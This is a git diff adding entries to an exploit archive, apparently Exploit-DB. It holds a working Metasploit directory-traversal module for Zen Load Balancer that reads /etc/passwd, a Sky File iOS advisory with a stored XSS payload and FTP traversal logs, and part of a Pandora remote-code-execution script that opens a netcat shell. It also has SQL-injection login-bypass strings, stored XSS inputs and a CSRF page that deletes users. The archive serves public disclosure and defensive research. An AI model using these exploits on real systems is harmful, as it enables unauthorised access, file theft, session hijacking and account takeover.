diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb
new file mode 100755
index 000000000..5e00bbf82
--- /dev/null
+++ b/exploits/cgi/webapps/48373.rb
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Zen Load Balancer Directory Traversal",
+      'Description'    => %q{
+          This module exploits a authenticated directory traversal
+vulnerability in Zen Load
+          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
+properly handling 'filelog='
+          parameter which allows a malicious actor to load arbitrary file path.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Basim Alabdullah', # Vulnerability discovery
+          'Dhiraj Mishra'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['EDB', '48308']
+        ],
+      'DisclosureDate' => "Apr 10 2020"
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(444),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
+        OptString.new('FILEPATH', [false, 'The name of the file to
+download', '/etc/passwd']),
+        OptString.new('TARGETURI', [true, "The base URI path of the
+ZenConsole install", '/']),
+        OptString.new('HttpUsername', [true, 'The username to use for
+the HTTP server', 'admin']),
+        OptString.new('HttpPassword', [false, 'The password to use for
+the HTTP server', 'admin'])
+      ])
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "../" * datastore['DEPTH']
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'index.cgi'),
+      'vars_get'=>
+      {
+        'id'      => '2-3',
+        'filelog' => "#{traversal}#{filename}",
+        'nlines'  => '100',
+        'action'  => 'See logs'
+      },
+      'authorization' =>
+basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
+      }, 25)
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    print_good("#{peer} - Downloaded #{res.body.length} bytes")
+    path = store_loot(
+      'zenload.http',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end
\ No newline at end of file
diff --git a/exploits/ios/webapps/48375.txt b/exploits/ios/webapps/48375.txt
new file mode 100644
index 000000000..27dd13c8c
--- /dev/null
+++ b/exploits/ios/webapps/48375.txt
@@ -0,0 +1,322 @@
+# Title: Sky File 2.1.0 iOS - Directory Traversal
+# Author: Vulnerability Laboratory
+# Date: 2020-04-21
+# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210
+# CVE: N/A
+
+Document Title:
+===============
+Sky File v2.1.0 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2207
+
+
+Common Vulnerability Scoring System:
+====================================
+7.2
+
+
+Affected Product(s):
+====================
+Jin Chen
+Product: Sky File v2.1.0 - (iOS) Mobile Web Application
+(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-21: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+1.1
+Multiple persistent cross site scripting vulnerabilities has been
+discovered in the official Sky File v2.1.0 mobile ios web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The cross site vulnerability is located in the 'createFolder' module.
+Remote attackers with access to the ui via wifi are able
+to inject own malicious persistent script code to compromise the
+web-application or user credentials. The request method to
+inject is POST and the attack vector is located on the application-side.
+
+Successful exploitation of the vulnerability results session hijacking,
+persistent phishing, persistent external redirects  and
+application-side manipulation of the web context of the affected and
+connected device module.
+
+
+1.2
+A directory traversal web vulnerability has been discovered in the
+official Sky File v2.1.0 mobile ios web-application.
+The web vulnerability allows an attacker to unauthorized change the path
+or directory to access sensitive application data.
+
+The directory / path webvulnerability is located in the local ftp server
+configuration and path validation with the insecure
+access permissions. Normally the anonymous user account is only able to
+move inside the main app folder but not above to the
+web-server and root application files. In case of the issue remote
+attackers are able to connect with anonymous user account
+credentials to the wifi ftp server. After that the attacker can use a
+misconfiguration in the ftp server of the app path to
+transmit a `/null//` path commands after CWD and CDUP navigation via ftp
+client. Thus allows the attacker to finally
+unauthorized access the main root application path.
+
+Successful exploitation of the directory traversal vulnerability results
+in unauthorized file system access and information disclosure.
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The persistent script code inject vulnerability can be exploited by
+remote attackers with wifi network access with low user interaction.
+For security demonstration or to reproduce the web vulnerability follow
+the provided information and steps below to continue.
+
+
+PoC: Payload
+%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E
+
+
+--- PoC Session Logs [POST] ---
+Status: 200[OK]
+POST http://localhost:10000/create
+Mime Type[application/json]
+   Request Header:
+      Host[localhost:10000]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+      Accept[application/json, text/javascript, */*; q=0.01]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:10000/]
+      Content-Length[140]
+      Connection[keep-alive]
+   POST-Daten:
+
+path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E]
+   Response Header:
+      Cache-Control[no-cache]
+      Content-Length[2]
+      Content-Type[application/json]
+      Connection[Close]
+      Server[GCDWebUploader]
+-
+Status: 200[OK]
+GET
+http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E
+Mime Type[application/json]
+   Request Header:
+      Host[localhost:10000]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+      Accept[application/json, text/javascript, */*; q=0.01]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost:10000/]
+      Connection[keep-alive]
+   Response Header:
+      Cache-Control[no-cache]
+      Content-Length[2]
+      Content-Type[application/json]
+      Connection[Close]
+      Server[GCDWebUploader]
+-
+Status: 200[OK]
+GET http://localhost:10000/evil.source
+Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost:10000]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:10000/]
+      Connection[keep-alive]
+      Upgrade-Insecure-Requests[1]
+   Response Header:
+      Server[GCDWebUploader]
+      Connection[Close]
+
+
+
+1.2
+The directory traversal web vulnerability can be exploited by remote
+attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the web vulnerability follow
+the provided information and steps below to continue.
+
+
+Manual steps to reproduce ...
+1. Open the ftp preview the visible folders
+2. Jump back to the the following path
+/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/
+3. Include the payload /(null)// and refresh via list command
+4. You are now placed in an empty folder without permission to move
+5. Add to /(null)/../ to the path and refresh the client
+6. Path traversal successful to access the main app root path (./) that
+is normally not accessable
+7. Successful reproduce of the path traversal web vulnerability!
+
+
+PoC: Payload
+/(null)//  to  /(null)/../
+
+
+--- PoC Sessio Logs (FTP) ---
+[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files
+[21:52:40] [R] 221 Thank you for using the FTP service on localhost.
+[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds)
+[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001
+[21:52:42] [R] Connected to 192.168.2.116
+[21:52:42] [R] 220 iosFtp server ready.
+[21:52:42] [R] USER anonymous
+[21:52:42] [R] 331 Password required for (null)
+[21:52:42] [R] PASS (hidden)
+[21:52:42] [R] 230 User (null) logged in.
+[21:52:42] [R] SYST
+[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912
+[21:52:42] [R] FEAT
+[21:52:42] [R] 211-Features supported
+[21:52:42] [R]  UTF8
+[21:52:42] [R] 211 End
+[21:52:42] [R] OPTS UTF8 ON
+[21:52:42] [R] 200 Type set Opts to  UTF8.
+[21:52:42] [R] PWD
+[21:52:42] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
+is the current directory.
+[21:52:42] [R] CWD /(null)/
+[21:52:42] [R] 550 CWD failed.
+[21:52:42] [R] PWD
+[21:52:42] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder"
+is the current directory.
+[21:52:42] [R] PASV
+[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252)
+[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236
+[21:52:42] [R] LIST -al
+[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:42] [R] 226 Transfer complete.
+[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s)
+[21:52:43] [R] CDUP
+[21:52:43] [R] 250 CDUP command successful.
+[21:52:43] [R] PWD
+[21:52:43] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder"
+is the current directory.
+[21:52:43] [R] PASV
+[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51)
+[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323
+[21:52:43] [R] LIST -al
+[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:43] [R] 226 Transfer complete.
+[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s)
+[21:52:43] [R] CDUP
+[21:52:44] [R] 250 CDUP command successful.
+[21:52:44] [R] PWD
+[21:52:44] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents"
+is the current directory.
+[21:52:44] [R] PASV
+[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51)
+[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707
+[21:52:44] [R] LIST -al
+[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:52:44] [R] 226 Transfer complete.
+[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s)
+[21:53:34] [R] CDUP
+[21:53:34] [R] 250 CDUP command successful.
+[21:53:34] [R] PWD
+[21:53:34] [R] 257
+"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45"
+is the current directory.
+[21:53:34] [R] PASV
+[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14)
+[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126
+[21:53:34] [R] LIST -al
+[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:34] [R] 226 Transfer complete.
+[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s)
+[21:53:35] [R] CDUP
+[21:53:35] [R] 250 CDUP command successful.
+[21:53:35] [R] PWD
+[21:53:35] [R] 257 "(null)" is the current directory.
+[21:53:35] [R] PASV
+[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14)
+[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718
+[21:53:35] [R] LIST -al
+[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:35] [R] 226 Transfer complete.
+[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s)
+[21:53:35] [R] PASV
+[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14)
+[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622
+[21:53:35] [R] LIST -al
+[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:35] [R] 226 Transfer complete.
+[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s)
+[21:53:36] [R] CDUP
+[21:53:36] [R] 550 CDUP command failed.
+[21:53:41] [R] CWD /etc
+[21:53:41] [R] 250 CWD command successful.
+[21:53:41] [R] PWD
+[21:53:41] [R] 257 "(null)" is the current directory.
+[21:53:48] [R] CDUP
+[21:53:48] [R] 550 CDUP command failed.
+[21:53:51] [R] CWD /
+[21:53:51] [R] 250 CWD command successful.
+[21:53:51] [R] PWD
+[21:53:51] [R] 257 "/" is the current directory.
+[21:53:51] [R] PASV
+[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173)
+[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749
+[21:53:51] [R] LIST -al
+[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'.
+[21:53:51] [R] 226 Transfer complete.
+[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s)
+[21:54:02] [R] TYPE I
+[21:54:02] [R] 200 Type set to  I.
+
+Listing Path ./root
+- Applications
+- bin
+- cores
+- developer
+- Library
+- private
+- sbin
+- System
+- usr
+- etc
+- var
+- tmp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/47898.py b/exploits/php/webapps/47898.py
index 4cd329aa0..46246b5c1 100755
--- a/exploits/php/webapps/47898.py
+++ b/exploits/php/webapps/47898.py
@@ -12,32 +12,32 @@
 import requests
 import sys
 
-if len(sys.argv) !=3D 6:
+if len(sys.argv) != 6:
     print("[+] Usage : ./exploit.py target username password ip port")
     exit()
 
-target =3D sys.argv[1]
-username =3D sys.argv[2]
-password =3D sys.argv[3]
-ip =3D sys.argv[4]
-port =3D int(sys.argv[5])
+target = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = int(sys.argv[5])
 
-request =3D requests.session()
+request = requests.session()
 
-login_info =3D {
+login_info = {
     "nick": username,
     "pass": password,
     "login_button": "Login"
 }
 
-login_request =3D request.post(
-    target+"/pandora_console/index.php?login=3D1",
+login_request = request.post(
+    target+"/pandora_console/index.php?login=1",
     login_info,
-    verify=3DFalse,
-    allow_redirects=3DTrue
+    verify=False,
+    allow_redirects=True
  )
 
-resp =3D login_request.text
+resp = login_request.text
 
 if "User not found in database" in resp:
     print("[-] Login Failed")
@@ -47,7 +47,7 @@ else:
 
 print("[+] Sending crafted graph request ..")
 
-body_request =3D {
+body_request = {
     "date": "0",
     "time": "0",
     "period": "0",
@@ -65,7 +65,6 @@ body_request =3D {
     "draw_button": "Draw"
 }
 
-draw_url =3D target + "/pandora_console/index.php?sec=3Dnetf&sec2=3Doperati=
-on/netflow/nf_live_view&pure=3D0"
+draw_url = target + "/pandora_console/index.php?sec=netf&sec2=operati=on/netflow/nf_live_view&pure=0"
 print("[+] Check your netcat ;)")
 request.post(draw_url, body_request)
\ No newline at end of file
diff --git a/exploits/php/webapps/48368.txt b/exploits/php/webapps/48368.txt
new file mode 100644
index 000000000..457a98a70
--- /dev/null
+++ b/exploits/php/webapps/48368.txt
@@ -0,0 +1,50 @@
+# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: v2.0
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here:
+
+Insert user registration information to the DB without filtering.
+
+if(isset($_POST['signup']))
+{
+$fname=$_POST['fname'];
+$lname=$_POST['lname'];
+$email=$_POST['email'];
+$password=$_POST['password'];
+$contact=$_POST['contact'];
+$enc_password=$password;
+$msg=mysqli_query($con,"insert into
+users(fname,lname,email,password,contactno)
+values('$fname','$lname','$email','$enc_password','$contact')");
+if($msg)
+{
+echo "<script>alert('Register successfully');</script>";
+}
+}
+
+2- In the admin dashboard:
+
+Get fullName from DB and print it without any filtering
+
+<?php $ret=mysqli_query($con,"select * from users");
+$cnt=1;
+while($row=mysqli_fetch_array($ret))
+{?>
+<tr>
+<td><?php echo $cnt;?></td>
+<td><?php echo $row['fname'];?></td>
+<td><?php echo $row['lname'];?></td>
+<td><?php echo $row['email'];?></td>
+<td><?php echo $row['contactno'];?></td> <td><?php echo
+$row['posting_date'];?></td>
+</tr>
+
+4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
+perform this attack as "Stored XSS"
\ No newline at end of file
diff --git a/exploits/php/webapps/48369.txt b/exploits/php/webapps/48369.txt
new file mode 100644
index 000000000..5fe1b5d54
--- /dev/null
+++ b/exploits/php/webapps/48369.txt
@@ -0,0 +1,49 @@
+# Exploit Title: User Management System 2.0 - Authentication Bypass
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
+# Version: v2.0
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+
+------ Details:
+
+1- Vulnerable code is here (admin login: /admin/index.php):
+
+<?php
+session_start();
+include("dbconnection.php");
+if(isset($_POST['login']))
+{
+  $adminusername=$_POST['username'];
+  $pass=md5($_POST['password']);
+  $ret=mysqli_query($con,"SELECT * FROM admin WHERE
+username='$adminusername' and password='$pass'");
+  $num=mysqli_fetch_array($ret);
+if($num>0)
+{
+   $extra="manage-users.php";
+   $_SESSION['login']=$_POST['username'];
+   $_SESSION['id']=$num['id'];
+echo "<script>window.location.href='".$extra."'</script>";
+exit();
+}
+else
+{
+    $_SESSION['action1']="*Invalid username or password";
+   $extra="index.php";
+echo "<script>window.location.href='".$extra."'</script>";
+exit();
+}
+}
+
+2-  We can bypass authentication with SQLi:
+
+Bypass code (user and admin login panel):
+
+Username: pentester' or'1'=1#
+Password : pentester' or'1'=1#
+
+Finally: There is a lot of SQLi input in this project. Like, login,
+registration, forgot password ...
\ No newline at end of file
diff --git a/exploits/php/webapps/48370.txt b/exploits/php/webapps/48370.txt
new file mode 100644
index 000000000..7f1ad6b7c
--- /dev/null
+++ b/exploits/php/webapps/48370.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here: http://localhost/cms/users/registration.php
+2- Vulnerable code:
+
+Insert user registration information to the DB without filtering.
+
+if(isset($_POST['submit']))
+{
+$fullname=$_POST['fullname'];
+$email=$_POST['email'];
+$password=md5($_POST['password']);
+$contactno=$_POST['contactno'];
+$status=1;
+$query=mysqli_query($con,"insert into
+users(fullName,userEmail,password,contactNo,status)
+values('$fullname','$email','$password','$contactno','$status')");
+$msg="Registration successfull. Now You can login !";
+}
+?>
+
+3- In the admin dashboard:
+
+Get fullName from DB and print it without any filtering
+
+<tr>
+<td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td>
+</tr>
+
+4- If we insert "fullName" as "script>prompt(2)</script>", we can perform
+this attack as "Stored XSS"
+
+5- Picture in the Attachemnt
+---------------------------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/48371.txt b/exploits/php/webapps/48371.txt
new file mode 100644
index 000000000..681c6b849
--- /dev/null
+++ b/exploits/php/webapps/48371.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Complaint Management System 4.2 - Authentication Bypass
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+------ Details:
+
+1- Vulnerable code is here:
+
+if(isset($_POST['submit']))
+{
+$username=$_POST['username'];
+$password=md5($_POST['password']);
+$ret=mysqli_query($con,"SELECT * FROM admin WHERE
+username='$username' and password='$password'");
+$num=mysqli_fetch_array($ret);
+if($num>0)
+{
+$extra="change-password.php";//
+$_SESSION['alogin']=$_POST['username'];
+$_SESSION['id']=$num['id'];
+$host=$_SERVER['HTTP_HOST'];
+$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
+header("location:http://$host$uri/$extra");
+exit();
+}
+
+2- We can bypass authentication with SQLi:
+
+Bypass code (admin login panel):
+
+Username: pentester' or'1'=1#
+Password : pentester' or'1'=1#
+
+Finally: There is a lot of SQLi input in this project. Like, login,
+registration, forgot password ...
+-----------------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/48372.txt b/exploits/php/webapps/48372.txt
new file mode 100644
index 000000000..61f2dda41
--- /dev/null
+++ b/exploits/php/webapps/48372.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
+# Author: Besim ALTINOK
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/complaint-management-sytem/
+# Version: v4.2
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+*************************************************
+Detail:
+
+You can perform CSRF Attack for all the functions.
+
+----------------------------------------------
+
+CSRF PoC for Delete User
+----------------------------------------------
+This request performs over the GET request with uid.
+------------------------------------------------------------------------
+<html>
+<body>
+<script>history.pushState('', '', '/')</script>
+<form action="http://localhost/cms/admin/manage-users.php">
+<input type="hidden" name="uid" value="4" />
+<input type="hidden" name="" value="" />
+<input type="hidden" name="action" value="del" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e715555db..5b809e378 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42396,6 +42396,7 @@ id,file,description,date,author,type,platform,port
 47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
 47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
 47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
+48368,exploits/php/webapps/48368.txt,"User Management System 2.0 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php,
 47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
 47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
 47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
@@ -42604,3 +42605,9 @@ id,file,description,date,author,type,platform,port
 48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware,
 48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware,
 48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux,
+48369,exploits/php/webapps/48369.txt,"User Management System 2.0 - Authentication Bypass",2020-04-23,Besim,webapps,php,
+48370,exploits/php/webapps/48370.txt,"Complaint Management System 4.2 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php,
+48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php,
+48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php,
+48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,
+48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios,